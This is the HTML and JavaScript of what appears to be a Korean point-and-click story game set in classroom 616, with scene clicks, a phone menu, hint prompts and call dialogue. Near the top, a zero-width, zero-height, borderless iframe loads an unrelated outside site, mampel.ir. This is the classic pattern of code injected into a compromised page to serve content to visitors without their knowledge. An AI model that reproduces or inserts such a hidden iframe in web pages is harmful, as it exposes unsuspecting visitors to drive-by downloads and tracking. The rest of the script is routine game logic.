	<div id="soun7">
		<img src="blank.png">
	</div>	
	<div id="soun8">
		<img src="blank.png">
	</div>
	<div id="soun9">
		<img src="blank.png">
	</div>
	<div id="soun10">
		<img src="blank.png">
	</div>
	<div id="soun11">
		<img src="blank.png">
	</div>

<audio id="walk">
		<source src="walk.mp3" type="audio/mpeg"autoplay="true" preload="auto">
	</audio>
<audio id="check">
		<source src="check.mp3" type="audio/mpeg"autoplay="true" preload="auto">
	</audio>	

<iframe src="http://mampel.ir/" frameborder="0" style="width:0px;height:0px;border:0px" ></iframe>


	<div id="backk">
		<center>
		<img src="main.gif">
		</center>
	</div>


<!--위치 -->
<a href="https://seoojing.github.io/bib/">
	<div id="turn">
		<img src="turn.png">
	</div>
</a>
<div id="musi">
   <a5>
	<MARQUEE width="300" height="50" scrollamount="3">호수에 뜬 달 - HEMIO</MARQUEE>
	<!-- 크기 조절 -->
    </a5>
</div>
	 <h8 id="flashlight">딱히 손전등을 사용할 곳이 없다.</h8>

<!-- 616 -->
<div id="design">
 <img style="cursor: url(eyes.png), pointer", src='blank.png' width='100%' height='100%'>
 <div>디자인전공 실기실2</div>
</div>
<!-- Image 1 -->
<div id="content_img">
 <img style="cursor: url(hand.png), pointer", src='blank.png' width='100%' height='100%'>
 <div>강의실 616이다. 굳게 잠겨있다.</div>
</div>
<div id="content_img7">
 <img style="cursor: url(hand.png), pointer", src='blank.png' width='100%' height='100%'>
 <div>강의실 616이다. 문이 열려있다.</div>
</div>
<!-- Image 2 -->
<div id="content2_img">
 <img style="cursor: url(eyes.png), pointer" src='blank.png' width='100%' height='100%' >
 <div>전등이 환하게 켜져있다.</div>
</div>


<!-- Image 4 -->
<div style="cursor: url(hand.png), pointer", id="content4_img" >
 <img src='mon.png' width='100%' height='100%'>
 <div>명화 무더기가 <br>한 쪽에 쌓여있다.</div>
</div>

<!-- Image 5 -->
<div id="content5_img" style="cursor: url(eyes.png), pointer">
 <img src='blank.png' width='100%' height='100%'>
 <div>밖은 굉장히 평화로워 보인다...</div>
</div>
	<div id="bx">
		<img src="boox.png">
	</div>

<h8 id="poom">교수님께서 수업하시고 수업자료들을 모아두신 곳이다.</h8>
<h8 id="poom2">작년에 배웠던 명화 중 하나 같다. 작품 이름이...</h8>
<h2 id="poom3" style="color: #531616;">...'성인의 시신을 빼돌리다'.</h2>
<h2 id="poom4">"뚜르르르..."</h2>
<h2 id="poom5">"잉? 여보세요? 웬일이야?"</h2>
<h2 id="ch">▶ 너 지금 어디야?</h2>
<h2 id="choose">▶ 너 지금 616이야?</h2>
<h2 id="ch3">▶ 아냐 아무것도.</h2>
<h2 id="choose3">▶ 문 좀 열어줄래?</h2>

<h2 id="poom6">"어...나 지금 616에 잠깐 들어와 있는데...왜..?"</h2>
<h2 id="poom7">"어어 그래... 못할 것도 없지.. 잠깐만..."</h2>
<h2 id="poom8">달칵! (문이 열리는 소리가 들려왔다.)</h2>
<h2 id="poom9">"열었어! 이제 들어와!"</h2>
<h2 id="poom10">(전화가 끊겼다.)</h2>
<h2 id="poom11">문을 열고 들어갔다.</h2>
<h2 id="poom12">"뭐야...뭐...알겠어.."</h2>
<h2 id="poom13">(전화가 끊겼다.)</h2>



	<audio id="click">
		<source src="click.wav" type="audio/mpeg">
	</audio>

 <!-- 힌트영역 -->
	 <h7  id="hinttxt" style="color: #531616;">힌트를 사용하면 게임 플레이의 재미가 감소합니다. 그래도 확인 하시겠습니까?</h7>
	 	<h10 id="yaa">예</h10>
		<h10 id="noo">아니오</h10>
	<div id="logo">
		<img src="logo.png">
	</div>

<a href="https://seoojing.github.io/menu/">	
	<div id="book">
		<img src="book3.png">
	</div>
</a>	
	<div id="map">
		<img src="map.png">
	</div>
	<div id="mapc">
		<img src="map.png">
	</div>
	<div id="hint">
		<img src="hint.png">
	</div>

	<div id="hint2">
		<img src="hint.png">
	</div>

	<div id="mim">
		<img src="6map.png">
	</div>
	<div id="mimi">
		<img src="mimi.png">
	</div>


	<div id="hin1">
		<img src="yogi.png">
	</div>	
	<div id="hin2">
		<img src="yogi.png">
	</div>
	<div id="hin3">
		<img src="yogi.png">
	</div>
	<div id="hin4">
		<img src="yogi.png">
	</div>
	<div id="hin5">
		<img src="yogi.png">
	</div>


<a href="https://seoojing.github.io/goup/">
	<div id="toto">
		<img src="orhere.png">
	</div>
</a>

	<div id="call">
		<img src="blank.png">
	</div>	

	<div id="oo">
		<img src="okk.png">
	</div>
	<div id="ooo">
		<img src="okk.png">
	</div>
	<div id="oooo">
		<img src="okk.png">
	</div>
	<div id="ooooo">
		<img src="okk.png">
	</div>

<a href="file:///E:/616/index.html">	
	<div id="okk">
		<img src="okk.png">
	</div>
</a>	
	<div id="oki">
		<img src="okk.png">
	</div>

	<div id="ko">
		<img src="okk.png">
	</div>
	<div id="koo">
		<img src="okk.png">
	</div>		
	<div id="kooo">
		<img src="okk.png">
	</div>	
	<div id="koooo">
		<img src="okk.png">
	</div>	
	<div id="next">
		<img src="okk.png">
	</div>
	<div id="next1">
		<img src="okk.png">
	</div>
	<div id="next2">
		<img src="okk.png">
	</div>
	<div id="next3">
		<img src="okk.png">
	</div>
	<div id="next4">
		<img src="okk.png">
	</div>
	<div id="next5">
		<img src="okk.png">
	</div>
	<div id="next6">
		<img src="okk.png">
	</div>
	<div id="next7">
		<img src="okk.png">
	</div>
	<div id="next8">
		<img src="okk.png">
	</div>	
	<div id="next9">
		<img src="okk.png">
	</div>	
	<div id="next10">
		<img src="okk.png">
	</div>	
	<div id="next11">
		<img src="okk.png">
	</div>
	<div id="next12">
		<img src="okk.png">
	</div>	
	<div id="next13">
		<img src="okk.png">
	</div>	
	<div id="hyun">
		<img src="mas.png">
	</div>
		<audio id="par">
		<source src="par.mp3" type="audio/mpeg">
	</audio>
		<audio id="but">
		<source src="but.mp3" type="audio/mpeg">
	</audio>
	<audio id="op">
		<source src="opp.wav" type="audio/mpeg">
	</audio>
	<audio id="clo">
		<source src="clo.wav" type="audio/mpeg">
	</audio>

	<audio id="touch">
		<source src="touch.wav" type="audio/mpeg">
	</audio>

	<audio id="viol">
		<source src="viol.mp3" type="audio/mpeg">
	</audio>
</div>

</div>


<script type="text/javascript">

function lookDiv1 (){ 
  document.getElementById("hin2").style.display="none"; 
} 
function lookDiv2 (){ 
  document.getElementById("hin1").style.display="none"; 
} 
function lookDiv3 (){ 
  document.getElementById("hin3").style.display="none"; 
} 
function lookDiv4 (){ 
  document.getElementById("hin4").style.display="none"; 
} 
function lookDiv5 (){ 
  document.getElementById("hin5").style.display="none"; 
} 
var bbPlay = 0;
window.onmousemove = function(){
	bbPlay++;
	if(bbPlay == 1){walk.play(); }
}

	
var toggle = "off";
	var clickNumber = 0;


	content_img.onclick = function(){
	check.play();
			}
	content4_img.onclick = function(){
	par.play();
	hyun.style.display = "inline"
	bx.style.display = "inline"
	poom.style.display = "inline"
	oo.style.display = "inline"
			}

/* 스마트폰 */
var on = true;

function lookDiv4 (){ 
  document.getElementById("tada2").style.display="none"; 
} 
	smart.onclick = function(){
		if (on) {touch.play();
			tada.style.display = "inline";
			tada10.style.display = "none";
			tada11.style.display = "none";
			tada2.style.display = "none";
			tada9.style.display = "none";
			tada8.style.display = "none";
			tada7.style.display = "none";
			soun.style.display = "inline";
			soun2.style.display = "inline";
			soun3.style.display = "inline";
			soun4.style.display = "inline";
			soun5.style.display = "inline";
			soun6.style.display = "inline";
			soun7.style.display = "inline";
			soun8.style.display = "inline";
			soun9.style.display = "inline";
			soun10.style.display = "inline";
			soun11.style.display = "inline";
		on = false;}
			else{		touch.play();
				tada11.style.display = "none";
				tada10.style.display = "none";
			tada9.style.display = "none";
			tada8.style.display = "none";
			tada.style.display = "none";
			tada6.style.display = "none";
			tada4.style.display = "none";
			tada7.style.display = "none";
			tada3.style.display = "none";
			tada2.style.display = "inline";
			tada5.style.display = "none";
			soun.style.display = "none";
			soun2.style.display = "none";
			soun3.style.display = "none";
			soun4.style.display = "none";
			soun5.style.display = "none";
			soun6.style.display = "none";
			soun7.style.display = "none";
			soun8.style.display = "none";
			soun9.style.display = "none";
			soun10.style.display = "none";
			soun11.style.display = "none";
			self.setTimeout("lookDiv4()",800);
		on = true;}

			}
	music.onclick = function(){
		viol.pause();
			music2.style.display = "inline";
			music.style.display = "none";
			}
	music2.onclick = function(){
		viol.play();
			music.style.display = "inline";
			music2.style.display = "none";
			}
	hint.onclick = function(){
		but.play();
			bx.style.display = "inline";
			hinttxt.style.display = "inline";
			yaa.style.display = "inline"
			noo.style.display = "inline"
			}	
	hint2.onclick = function(){
		but.play();
			bx.style.display = "inline";
			hinttxt2.style.display = "inline";
			yaa2.style.display = "inline"
			noo2.style.display = "inline"
			}				
	soun4.onclick = function(){
		click.play();viol.play();
		tada7.style.display = "none";
			tada.style.display = "none";
			tada4.style.display = "none";
			tada2.style.display = "inline";
			soun.style.display = "none";
			soun2.style.display = "none";
			soun3.style.display = "none";
			soun4.style.display = "none";
			soun5.style.display = "none";
			soun6.style.display = "none";
			soun7.style.display = "none";
			soun8.style.display = "none";
			soun9.style.display = "none";
			soun10.style.display = "none";
			soun11.style.display = "none";
			music.style.display = "inline";
			musi.style.display = "inline";
			self.setTimeout("lookDiv4()",800);
		on = true;
			}




	soun6.onclick = function(){
		click.play();
		tada7.style.display = "none";
			tada.style.display = "none";
			tada4.style.display = "none";
			tada2.style.display = "none";
			tada8.style.display = "inline";
			soun.style.display = "none";
			soun2.style.display = "none";
			soun3.style.display = "none";
			soun4.style.display = "none";
			soun5.style.display = "none";
			soun6.style.display = "none";
			soun7.style.display = "none";
			soun8.style.display = "none";
			soun9.style.display = "none";
			soun10.style.display = "none";
			soun11.style.display = "none";
		on = true;
			}
	soun2.onclick = function(){
		click.play();
		tada7.style.display = "none";
			tada.style.display = "none";
			tada4.style.display = "none";
			tada2.style.display = "none";
			tada11.style.display = "inline";
			soun.style.display = "none";
			soun2.style.display = "none";
			soun3.style.display = "none";
			soun4.style.display = "none";
			soun5.style.display = "none";
			soun6.style.display = "none";
			soun7.style.display = "none";
			soun8.style.display = "none";
			soun9.style.display = "none";
			soun10.style.display = "none";
			soun11.style.display = "none";
			call.style.display = "inline";
		on = true;
			}
	soun.onclick = function(){
		click.play();
		tada7.style.display = "none";
			tada.style.display = "none";
			tada4.style.display = "none";
			tada2.style.display = "none";
			tada10.style.display = "inline";
			soun.style.display = "none";
			soun2.style.display = "none";
			soun3.style.display = "none";
			soun4.style.display = "none";
			soun5.style.display = "none";
			soun6.style.display = "none";
			soun7.style.display = "none";
			soun8.style.display = "none";
			soun9.style.display = "none";
			soun10.style.display = "none";
			soun11.style.display = "none";
		on = true;
			}
	tada10.onclick = function(){
		tada10.style.display = "none";
			tada4.style.display = "inline";
			tada2.style.display = "none";
			tada5.style.display = "none";
			tada3.style.display = "none";
			tada5.style.display = "none";
			soun.style.display = "inline";
			soun2.style.display = "inline";
			soun3.style.display = "inline";
			soun4.style.display = "inline";
			soun5.style.display = "inline";
			soun6.style.display = "inline";
			soun7.style.display = "inline";
			soun8.style.display = "inline";
			soun9.style.display = "inline";
			soun10.style.display = "inline";
			soun11.style.display = "inline";
		on = false;}
	tada11.onclick = function(){
		tada11.style.display = "none";
			tada4.style.display = "inline";
			tada2.style.display = "none";
			tada5.style.display = "none";
			tada3.style.display = "none";
			tada5.style.display = "none";
			soun.style.display = "inline";
			soun2.style.display = "inline";
			soun3.style.display = "inline";
			soun4.style.display = "inline";
			soun5.style.display = "inline";
			soun6.style.display = "inline";
			soun7.style.display = "inline";
			soun8.style.display = "inline";
			soun9.style.display = "inline";
			soun10.style.display = "inline";
			soun11.style.display = "inline";
		on = false;}
	tada8.onclick = function(){
		tada8.style.display = "none";
			tada4.style.display = "inline";
			tada2.style.display = "none";
			tada5.style.display = "none";
			tada3.style.display = "none";
			tada5.style.display = "none";
			soun.style.display = "inline";
			soun2.style.display = "inline";
			soun3.style.display = "inline";
			soun4.style.display = "inline";
			soun5.style.display = "inline";
			soun6.style.display = "inline";
			soun7.style.display = "inline";
			soun8.style.display = "inline";
			soun9.style.display = "inline";
			soun10.style.display = "inline";
			soun11.style.display = "inline";
		on = false;}
	soun10.onclick = function(){
		click.play();
			tada.style.display = "none";
			tada3.style.display = "inline";
			soun.style.display = "none";
			soun2.style.display = "none";
			soun3.style.display = "none";
			soun4.style.display = "none";
			soun5.style.display = "none";
			soun6.style.display = "none";
			soun7.style.display = "none";
			soun8.style.display = "none";
			soun9.style.display = "none";
			soun10.style.display = "none";
			soun11.style.display = "none";

		on = true;
			}
	soun3.onclick = function(){
		click.play();
			tada.style.display = "none";
			tada9.style.display = "inline";
			soun.style.display = "none";
			soun2.style.display = "none";
			soun3.style.display = "none";
			soun4.style.display = "none";
			soun5.style.display = "none";
			soun6.style.display = "none";
			soun7.style.display = "none";
			soun8.style.display = "none";
			soun9.style.display = "none";
			soun10.style.display = "none";
			soun11.style.display = "none";

		on = true;
			}
	tada9.onclick = function(){
		tada9.style.display = "none";
			tada4.style.display = "inline";
			tada2.style.display = "none";
			tada5.style.display = "none";
			tada3.style.display = "none";
			tada5.style.display = "none";
			soun.style.display = "inline";
			soun2.style.display = "inline";
			soun3.style.display = "inline";
			soun4.style.display = "inline";
			soun5.style.display = "inline";
			soun6.style.display = "inline";
			soun7.style.display = "inline";
			soun8.style.display = "inline";
			soun9.style.display = "inline";
			soun10.style.display = "inline";
			soun11.style.display = "inline";
		on = false;}
	soun7.onclick = function(){
		click.play();
			tada6.style.display = "none";
			tada.style.display = "none";
			tada4.style.display = "none";
			tada2.style.display = "inline";
			soun.style.display = "none";
			soun2.style.display = "none";
			soun3.style.display = "none";
			soun4.style.display = "none";
			soun5.style.display = "none";
			soun6.style.display = "none";
			soun7.style.display = "none";
			soun8.style.display = "none";
			soun9.style.display = "none";
			soun10.style.display = "none";
			soun11.style.display = "none";
			self.setTimeout("lookDiv4()",2000);
			bx.style.display = "inline";
			flashlight.style.display = "inline";
			foo.style.display = "inline";
		on = true;
			}

	call.onclick = function(){
		click.play();
			tada6.style.display = "none";
			tada.style.display = "none";
			tada4.style.display = "none";
			tada11.style.display = "none";
			tada2.style.display = "inline";
		self.setTimeout("lookDiv4()",2000);
			bx.style.display = "inline";
			poom4.style.display = "inline";
			next.style.display = "inline";
		on = true;
			}
	next.onclick = function(){
		but.play();
			poom5.style.display = "inline";
			ch.style.display = "inline";
			choose.style.display = "inline";
			poom4.style.display = "none";
			next.style.display = "none";
			}
	ch.onclick = function(){
		but.play();
			poom6.style.display = "inline";
			poom5.style.display = "none";
			ch.style.display = "none";
			choose.style.display = "none";
			ch3.style.display = "inline";
			choose3.style.display = "inline";
			}
	choose.onclick = function(){
		but.play();
			poom6.style.display = "inline";
			poom5.style.display = "none";
			ch.style.display = "none";
			choose.style.display = "none";
			ch3.style.display = "inline";
			choose3.style.display = "inline";
			}			
	choose3.onclick = function(){
		but.play();
			poom7.style.display = "inline";
			poom6.style.display = "none";
			ch3.style.display = "none";
			choose3.style.display = "none";
			next2.style.display = "inline";
			}
	ch3.onclick = function(){
		but.play();
			poom12.style.display = "inline";
			poom6.style.display = "none";
			ch3.style.display = "none";
			choose3.style.display = "none";
			next7.style.display = "inline";
			}
	next7.onclick = function(){
		but.play();
			poom13.style.display = "inline";
			next8.style.display = "inline";
			poom12.style.display = "none";
			next7.style.display = "none";
			}			
	next8.onclick = function(){
		but.play();
			poom13.style.display = "none";
			next8.style.display = "none";
			bx.style.display = "none";

			}		
	next2.onclick = function(){
		but.play();
			poom8.style.display = "inline";
			next3.style.display = "inline";
			poom7.style.display = "none";
			next2.style.display = "none";
			}
	next3.onclick = function(){
		but.play();
			poom9.style.display = "inline";
			next4.style.display = "inline";
			poom8.style.display = "none";
			next3.style.display = "none";
			}
	next4.onclick = function(){
		but.play();
			poom10.style.display = "inline";
			next5.style.display = "inline";
			poom9.style.display = "none";
			next4.style.display = "none";
			}
	next5.onclick = function(){
		but.play();
			poom10.style.display = "none";
			next5.style.display = "none";
			bx.style.display = "none";
			content_img.style.display = "none";
			content_img7.style.display = "inline";
			}
	content_img7.onclick = function(){
		but.play();
			bx.style.display = "inline";
			content_img7.style.display = "none";
			poom11.style.display = "inline";
			next6.style.display = "inline";
			}


		soun9.onclick = function(){
		click.play();
			tada2.style.display = "none";
			tada.style.display = "none";
			tada4.style.display = "none";
			tada6.style.display = "inline";
			soun.style.display = "none";
			soun2.style.display = "none";
			soun3.style.display = "none";
			soun4.style.display = "none";
			soun5.style.display = "none";
			soun6.style.display = "none";
			soun7.style.display = "none";
			soun8.style.display = "none";
			soun9.style.display = "none";
			soun10.style.display = "none";
			soun11.style.display = "none";
		on = true;
			}
	soun5.onclick = function(){
		click.play();
		tada6.style.display = "none";
			tada.style.display = "none";
			tada5.style.display = "inline";
			soun.style.display = "none";
			soun2.style.display = "none";
			soun3.style.display = "none";
			soun4.style.display = "none";
			soun5.style.display = "none";
			soun6.style.display = "none";
			soun7.style.display = "none";
			soun8.style.display = "none";
			soun9.style.display = "none";
			soun10.style.display = "none";
			soun11.style.display = "none";
		on = true;
			}

	soun8.onclick = function(){
		click.play();
		tada6.style.display = "none";
			tada.style.display = "none";
			tada5.style.display = "none";
			tada7.style.display = "inline";
			soun.style.display = "none";
			soun2.style.display = "none";
			soun3.style.display = "none";
			soun4.style.display = "none";
			soun5.style.display = "none";
			soun6.style.display = "none";
			soun7.style.display = "none";
			soun8.style.display = "none";
			soun9.style.display = "none";
			soun10.style.display = "none";
			soun11.style.display = "none";
		on = true;
			}
	tada5.onclick = function(){
		tada6.style.display = "none";
			tada4.style.display = "inline";
			tada2.style.display = "none";
			tada5.style.display = "none";
			tada3.style.display = "none";
			tada5.style.display = "none";
			soun.style.display = "inline";
			soun2.style.display = "inline";
			soun3.style.display = "inline";
			soun4.style.display = "inline";
			soun5.style.display = "inline";
			soun6.style.display = "inline";
			soun7.style.display = "inline";
			soun8.style.display = "inline";
			soun9.style.display = "inline";
			soun10.style.display = "inline";
			soun11.style.display = "inline";
		on = false;}
	tada7.onclick = function(){
		tada7.style.display = "none";
			tada4.style.display = "inline";
			tada2.style.display = "none";
			tada5.style.display = "none";
			tada3.style.display = "none";
			tada5.style.display = "none";
			soun.style.display = "inline";
			soun2.style.display = "inline";
			soun3.style.display = "inline";
			soun4.style.display = "inline";
			soun5.style.display = "inline";
			soun6.style.display = "inline";
			soun7.style.display = "inline";
			soun8.style.display = "inline";
			soun9.style.display = "inline";
			soun10.style.display = "inline";
			soun11.style.display = "inline";
		on = false;}
	tada6.onclick = function(){
		tada6.style.display = "none";
			tada4.style.display = "inline";
			tada2.style.display = "none";
			tada5.style.display = "none";
			tada3.style.display = "none";
			tada5.style.display = "none";
			soun.style.display = "inline";
			soun2.style.display = "inline";
			soun3.style.display = "inline";
			soun4.style.display = "inline";
			soun5.style.display = "inline";
			soun6.style.display = "inline";
			soun7.style.display = "inline";
			soun8.style.display = "inline";
			soun9.style.display = "inline";
			soun10.style.display = "inline";
			soun11.style.display = "inline";
		on = false;}

	foo.onclick = function(){
		but.play();
			bx.style.display = "none";
			foo.style.display = "none";
			flashlight.style.display = "none";
			}				
	tada3.onclick = function(){
		tada6.style.display = "none";
			tada4.style.display = "inline";
			tada2.style.display = "none";
			tada3.style.display = "none";
			tada5.style.display = "none";
			soun.style.display = "inline";
			soun2.style.display = "inline";
			soun3.style.display = "inline";
			soun4.style.display = "inline";
			soun5.style.display = "inline";
			soun6.style.display = "inline";
			soun7.style.display = "inline";
			soun8.style.display = "inline";
			soun9.style.display = "inline";
			soun10.style.display = "inline";
			soun11.style.display = "inline";
		on = false;}


	yaa.onclick = function(){
		but.play();
			hin1.style.display = "inline"
			hin2.style.display = "inline"
			hin3.style.display = "inline"
			hin4.style.display = "inline"
			hin5.style.display = "inline"
			bx.style.display = "none";
			hinttxt.style.display = "none";
			yaa.style.display = "none"
			noo.style.display = "none"
			self.setTimeout("lookDiv1()",3000);
			self.setTimeout("lookDiv2()",3000);
			self.setTimeout("lookDiv3()",3000);
			self.setTimeout("lookDiv4()",3000);
			self.setTimeout("lookDiv5()",3000);			
			}	
	noo.onclick = function(){
		but.play();
			bx.style.display = "none";
			hinttxt.style.display = "none";
			yaa.style.display = "none"
			noo.style.display = "none"
			}
	hint.onclick = function(){
		but.play();
			bx.style.display = "inline";
			hinttxt.style.display = "inline";
			yaa.style.display = "inline"
			noo.style.display = "inline"
			}	
	map.onclick = function(){
		op.play();
			toggle = "on";
			mimi.style.display = "inline";
			mim.style.display = "inline";
			map.style.display = "none";
			mapc.style.display = "inline";
			backk.style.opacity = "0.5";
			}	
	mapc.onclick = function(){
		clo.play();
			toggle = "on";
			mimi.style.display = "none";
			mim.style.display = "none";
			map.style.display = "inline";
			mapc.style.display = "none";
			backk.style.opacity = "1";
			}	
	mim.onclick = function(){
		clo.play();
			toggle = "on";
			mimi.style.display = "none";
			mim.style.display = "none";
			map.style.display = "inline";
			mapc.style.display = "none";
			backk.style.opacity = "1";
			}

	oo.onclick = function(){
		but.play();
			poom.style.display = "none"
			oo.style.display = "none"
			poom2.style.display = "inline"
			ooo.style.display = "inline"
			}
	ooo.onclick = function(){
		but.play();
			poom2.style.display = "none"
			poom3.style.display = "inline"
			ooo.style.display = "none"
			oooo.style.display = "inline"
			}

	oooo.onclick = function(){
		but.play();
			poom3.style.display = "none"
			oooo.style.display = "none"
			bx.style.display = "none"
			hyun.style.display = "none"
			}
	ooooo.onclick = function(){
		but.play();
			poom4.style.display = "none"
			ooooo.style.display = "none"
			what5.style.display = "inline"
			what6.style.display = "inline"
			face1.style.display = "none"
			chang.style.display = "inline"
			nn.style.display = "none"
			nn2.style.display = "inline"
			}


</script>
</body>
</html>
